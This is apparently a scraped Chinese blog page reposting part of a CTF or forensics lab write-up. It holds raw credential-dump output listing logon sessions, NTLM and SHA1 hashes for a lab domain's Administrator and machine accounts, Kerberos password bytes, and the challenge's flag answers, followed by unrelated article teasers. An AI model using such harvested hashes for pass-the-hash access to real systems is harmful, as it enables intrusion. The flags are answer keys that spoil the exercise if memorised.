SID               : S-1-5-90-1msv :[00000003] Primary* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* NTLM     : 5f82695a422af9105af8c29caa8406e6* SHA1     : 21fa78c558159124c9f55b1ab891d0426f2ee246tspkg :wdigest :* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* Password : (null)kerberos :* Username : WIN-MVNE1SFJ0LQ$* Domain   : dog.local* Password : 27 2d 17 f2 4b 16 db a8 ef d4 82 a5 49 dc f3 35 3e a8 d8 ad 08 73 fd 21 01 f5 2d b0 95 ec b2 5f 76 c1 ec e6 98 3f 41 54 af 9c 59 6c 6e 01 06 d3 b0 79 dc 42 c4 7f 3d a5 f3 61 ef fa 33 74 50 8c 84 9f 05 14 45 86 c0 4f 2f c6 8b 30 4f 4b 37 b4 ad 8d db ae eb 44 5d e4 39 e7 c3 be 6d f6 37 2e 41 ad 3f 35 3d a6 b8 1c e9 91 e6 f3 60 9d 21 c4 f8 9e 5f 0f 24 95 38 90 6b da 27 c0 2d 86 3a 5d 58 19 56 7f ad 68 3f 6e 4a de e2 fd 02 bd 0b af 06 3b 73 47 26 ab ce ba 72 96 ce 8f 21 1d 42 34 9a 5f 87 79 d5 20 07 63 b5 a9 ad 59 4d 96 6f 7f c8 d8 8f cd 0d 56 72 96 45 58 ad 55 66 f5 a4 6c 05 49 5b b2 fb e8 eb 5a 36 f2 9d 69 1f 69 fb b7 6f 19 43 01 43 c9 96 c4 18 73 24 52 ff 1c 15 62 3d 79 f3 6c 75 2e 38 28 07 5f 7f e0 e1 62 05 a0 ssp :   KOcredman :Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-MVNE1SFJ0LQ$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:00
SID               : S-1-5-20msv :[00000003] Primary* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* NTLM     : 94901a951ee2d32e070982b4276eebd6* SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3tspkg :wdigest :* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* Password : (null)kerberos :* Username : win-mvne1sfj0lq$* Domain   : DOG.LOCAL* Password : (null)ssp :   KOcredman :Authentication Id : 0 ; 27364 (00000000:00006ae4)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/4/3 7:12:58
SID               : msv :[00000003] Primary* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* NTLM     : 94901a951ee2d32e070982b4276eebd6* SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3tspkg :wdigest :kerberos :ssp :   KOcredman :Authentication Id : 0 ; 40540109 (00000000:026a97cd)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 11:49:36
SID               : S-1-5-90-2msv :[00000003] Primary* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* NTLM     : 94901a951ee2d32e070982b4276eebd6* SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3tspkg :wdigest :* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* Password : (null)kerberos :* Username : WIN-MVNE1SFJ0LQ$* Domain   : dog.local* Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2 ssp :   KOcredman :Authentication Id : 0 ; 480371 (00000000:00075473)
Session           : Interactive from 1
User Name         : Administrator
Domain            : DOG
Logon Server      : WIN-MVNE1SFJ0LQ
Logon Time        : 2024/4/3 7:29:29
SID               : S-1-5-21-2515766443-2959740750-3575737072-500msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2* SHA1     : 6aec174b0d46521c233a254120538a6bddecc0c7[00010000] CredentialKeys* NTLM     : e054e61488f2545292d4e5b9f722d9a2* SHA1     : 6aec174b0d46521c233a254120538a6bddecc0c7[00010000] CredentialKeys* NTLM     : 32ed87bdb5fdc5e9cba88547376818d4* SHA1     : 6ed5833cf35286ebf8662b7b5949f0d742bbec3ftspkg :wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG.LOCAL* Password : (null)ssp :   KOcredman :Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:16
SID               : S-1-5-19msv :tspkg :wdigest :* Username : (null)* Domain   : (null)* Password : (null)kerberos :* Username : (null)* Domain   : (null)* Password : (null)ssp :   KOcredman :Authentication Id : 0 ; 55865 (00000000:0000da39)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:11
SID               : S-1-5-90-1msv :[00000003] Primary* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* NTLM     : 94901a951ee2d32e070982b4276eebd6* SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3tspkg :wdigest :* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* Password : (null)kerberos :* Username : WIN-MVNE1SFJ0LQ$* Domain   : dog.local* Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2 ssp :   KOcredman :Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-MVNE1SFJ0LQ$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/3 7:12:52
SID               : S-1-5-18msv :tspkg :wdigest :* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* Password : (null)kerberos :* Username : win-mvne1sfj0lq$* Domain   : DOG.LOCAL* Password : (null)ssp :   KOcredman :

全部的sessions

32

flag1

0E089DC1595C3447DD62519756BCC4AC20C807D116065A385200E1A06D5F827486C5C25DCEC68876B07B8B31E416996122DAA05E280DD998396F6EF573A9D40F

flag2

E6B8C928198A4F27CAF809AE6AD48F9A7E56F7CC0632726C4A444DEF3D8C6E76A9918065141F2288DF7A0E790F2B1F4B783C99C7CFF29F0DD7F384CD6014B59F

flag3?

3da8bc4ccded97022b9cb114852a370522a2b9073a884e4e426045c26c18f1361d58dd69e69cf5e82f4a070eb23b5807464d6a0ee3481054ceeb2c775e51e18fe51a638bb72ccbf508462a03279913667c7d9bed48360d4289435614c7b144dcd082ceae5964ac8d168207da18e51ecde71cf8b1bbb8657ad7913e598b9b0b45bd30b09048e0e631e1851d70eb160af7b2dd132cfc3dd70af7704313044b790d44602813ddcb3eae899cf142fb1154659abe2a108257e9d9a8ef4d2ae9850136f83d8d669b6b58ef8654342b9e6ce94dc0a7ec85e7b14e5491afe6d4d98e08e978fff9d045b2b714402c8aa9a96221d2

nType from 0
User Name : WIN-MVNE1SFJ0LQ$
Domain : DOG
Logon Server : (null)
Logon Time : 2024/4/3 7:12:52
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* Password : (null)
kerberos :
* Username : win-mvne1sfj0lq$
* Domain : DOG.LOCAL
* Password : (null)
ssp : KO
credman :


全部的sessions[外链图片转存中...(img-AN9KgVtz-1727602850327)]flag1

0E089DC1595C3447DD62519756BCC4AC20C807D116065A385200E1A06D5F827486C5C25DCEC68876B07B8B31E416996122DAA05E280DD998396F6EF573A9D40F


flag2

E6B8C928198A4F27CAF809AE6AD48F9A7E56F7CC0632726C4A444DEF3D8C6E76A9918065141F2288DF7A0E790F2B1F4B783C99C7CFF29F0DD7F384CD6014B59F


flag3?

3da8bc4ccded97022b9cb114852a370522a2b9073a884e4e426045c26c18f1361d58dd69e69cf5e82f4a070eb23b5807464d6a0ee3481054ceeb2c775e51e18fe51a638bb72ccbf508462a03279913667c7d9bed48360d4289435614c7b144dcd082ceae5964ac8d168207da18e51ecde71cf8b1bbb8657ad7913e598b9b0b45bd30b09048e0e631e1851d70eb160af7b2dd132cfc3dd70af7704313044b790d44602813ddcb3eae899cf142fb1154659abe2a108257e9d9a8ef4d2ae9850136f83d8d669b6b58ef8654342b9e6ce94dc0a7ec85e7b14e5491afe6d4d98e08e978fff9d045b2b714402c8aa9a96221d2

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/55663.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Windows Ubuntu下搭建深度学习Pytorch训练框架与转换环境TensorRT

Windows Ubuntu下搭建深度学习Pytorch训练框架与转换环境TensorRT JetBrains2024&#xff08;IntelliJ IDEA、PhpStorm、RubyMine、Rider……&#xff09;安装包Anaconda Miniconda安装.condarc 文件配置镜像源查看conda的配置和源(channel)自定义conda虚拟环境路径conda常用命…

el-pagination组件封装

组件使用 源代码&#xff1a; <script setup> import Pagination from /components/pagination/index.vue import {ref} from "vue";const pageNum ref(1) const pageSize ref(10) const total ref(120)function loadData() {// 加载数据 } </script>…

【Unity】unity安卓打包参数(个人复习向/有不足之处欢迎指出/侵删)

1.Texture Compression 纹理压缩 设置发布后的纹理压缩格式 Use Player Settings:使用在播放器设置中设置的纹理压缩格式 ETC&#xff1a;使用ETC格式&#xff08;兼容&#xff09; ETC2&#xff1a;使用ETC2格式&#xff08;很多设备不支持&#xff09; ASTC&#xff1a;使用…

PCIe6.0 AIC金手指和板端CEM连接器信号完整性设计规范

先附上我之前写的关于PCIe5.0金手指的设计解读&#xff1a; PCIe5.0的Add-in-Card(AIC)金手指layout建议&#xff08;一&#xff09;_pcie cem-CSDN博客 PCIe5.0的Add-in-Card(AIC)金手指layout建议&#xff08;二&#xff09;_gnd bar-CSDN博客 首先&#xff0c;相较于PCI…

《深度学习》【项目】OpenCV 发票识别 透视变换、轮廓检测解析及案例解析

目录 一、透视变换 1、什么是透视变换 2、操作步骤 1&#xff09;选择透视变换的源图像和目标图像 2&#xff09;确定透视变换所需的关键点 3&#xff09;计算透视变换的变换矩阵 4&#xff09;对源图像进行透视变换 5&#xff09;对变换后的图像进行插值处理 二、轮廓检测…

Python | Leetcode Python题解之第454题四数相加II

题目&#xff1a; 题解&#xff1a; class Solution:def fourSumCount(self, A: List[int], B: List[int], C: List[int], D: List[int]) -> int:countAB collections.Counter(u v for u in A for v in B)ans 0for u in C:for v in D:if -u - v in countAB:ans countAB…

网约班车升级手机端退票

背景 作为老古董程序员&#xff0c;不&#xff0c;应该叫互联网人员&#xff0c;因为我现在做的所有的事情&#xff0c;都是处于爱好&#xff0c;更多的时间是在和各行各业的朋友聊市场&#xff0c;聊需求&#xff0c;聊怎么通过IT互联网 改变实体行业的现状&#xff0c;准确的…

k8s实战-2

k8s实战-2 一、Deployment1.多副本2.扩缩容3.自愈&故障转移4.滚动更新5.版本回退 二、Service1.ClusterIP2.NodePort 总结 一、Deployment Deployment 是 k8s 中的一个资源对象&#xff0c;用于管理应用的副本&#xff08;Pods&#xff09;。它的主要作用是确保集群中运行…

二分查找一>山脉数组的峰顶索引

1.题目&#xff1a; 2.解析&#xff1a; 代码&#xff1a; public int peakIndexInMountainArray(int[] arr) {int left 1, right arr.length-2;while(left < right) {int mid left (right-left1) / 2;if(arr[mid] > arr[mid-1]) left mid;else right mid-1;}ret…

软件测试:postman详解

一、Postman背景介绍 用户在开发或者调试网络程序或者是网页B/S模式的程序的时候是需要一些方法来跟踪网页请求的&#xff0c;用户可以使用一些网络的监视工具比如著名的Firebug等网页调试工具。今天给大家介绍的这款网页调试工具不仅可以调试简单的css、html、脚本等简单的网…

更新C语言题目

1.以下程序输出结果是() int main() {int a 1, b 2, c 2, t;while (a < b < c) {t a;a b;b t;c--;}printf("%d %d %d", a, b, c); } 解析:a1 b2 c2 a<b 成立 ,等于一个真值1 1<2 执行循环体 t被赋值为1 a被赋值2 b赋值1 c-- c变成1 a<b 不成立…

如何搭建自己的域名邮箱服务器?Poste.io邮箱服务器搭建教程,Linux+Docker搭建邮件服务器的教程

Linux系统Docker搭建Poste.io电子邮件服务器&#xff0c;搭建属于自己的域名邮箱服务器&#xff0c;可以无限收发电子邮件&#xff08;Email&#xff09;&#xff01; 视频教程&#xff1a;https://www.bilibili.com/video/BV11p1mYaEpM/ 前言 什么是域名邮箱&#xff1f; …

各省份-产业链现代化水平(2001-2022年)

产业链现代化水平是一个综合性指标&#xff0c;它为我们提供了一个多维度的视角来评估各省份在产业链现代化进程中的发展水平。这个指标涵盖了技术创新、产业升级、生产效率、产业结构优化等多个方面&#xff0c;包含原始数据、测算结果以及参考文献。 2001年-2022年各省份-产…

论文翻译 | Generated Knowledge Prompting for Commonsense Reasoning

摘要 整合外部知识是否有利于常识推理&#xff0c;同时保持预训练序列模型的灵活性&#xff0c;这仍然是一个悬而未决的问题。为了研究这个问题&#xff0c;我们开发了生成知识提示&#xff0c;它包括从语言模型生成知识&#xff0c;然后在回答问题时提供知识作为附加输入。我们…

【Java】IntelliJ IDEA开发环境安装

一、下载 官方地址&#xff1a;https://www.jetbrains.com/idea/ 点击Download直接下载 二、安装 双击安装包&#xff0c;点击Next 选择安装路径&#xff0c;点击Next 勾选安装内容 安装完成。 三、创建项目 打开IDEA&#xff0c;填写项目名称&#xff0c;选择项目安装路径…

如何使用ssm实现基于SSM的宠物服务平台的设计与实现+vue

TOC ssm779基于SSM的宠物服务平台的设计与实现vue 绪论 1.1 研究背景 当前社会各行业领域竞争压力非常大&#xff0c;随着当前时代的信息化&#xff0c;科学化发展&#xff0c;让社会各行业领域都争相使用新的信息技术&#xff0c;对行业内的各种相关数据进行科学化&#x…

安全帽头盔检测数据集 3类 12000张 安全帽数据集 voc yolo

安全帽头盔检测数据集 3类 12000张 安全帽数据集 voc yolo 安全帽头盔检测数据集介绍 数据集名称 安全帽头盔检测数据集 (Safety Helmet and Person Detection Dataset) 数据集概述 该数据集专为训练和评估基于YOLO系列目标检测模型&#xff08;包括YOLOv5、YOLOv6、YOLOv7…

【C++ STL】手撕vector,深入理解vector的底层

vector的模拟实现 前言一.默认成员函数1.1常用的构造函数1.1.1默认构造函数1.1.2 n个 val值的构造函数1.1.3 迭代器区间构造1.1.4 initializer_list 的构造 1.2析构函数1.3拷贝构造函数1.4赋值运算符重载 二.元素的插入,删除,查找操作2.1 operator[]重载函数2.2 push_back函数:…

Redis篇(面试题 - 连环16炮)(持续更新迭代)

目录 目录 目录 &#xff08;第一炮&#xff09;一、Redis&#xff1f;常用数据结构&#xff1f; 1. 项目里面到了Redis&#xff0c;为什么选用Redis&#xff1f; 2. Redis 是什么&#xff1f; 3. Redis和关系型数据库的本质区别有哪些&#xff1f; 4. Redis 的线程模型…

4 思科模拟器的介绍和使用

4 思科模拟器的介绍和使用 思科的IOS给我们提供了三大模式 设备开机后&#xff0c;进入的模式是【用户模式】 Router表示设备的名称 “>”表示用户模式 在用户模式输入"?" 可列出在用户模式可以使用的命令 第二种模式是特权模式,输入enable进入特权模式&…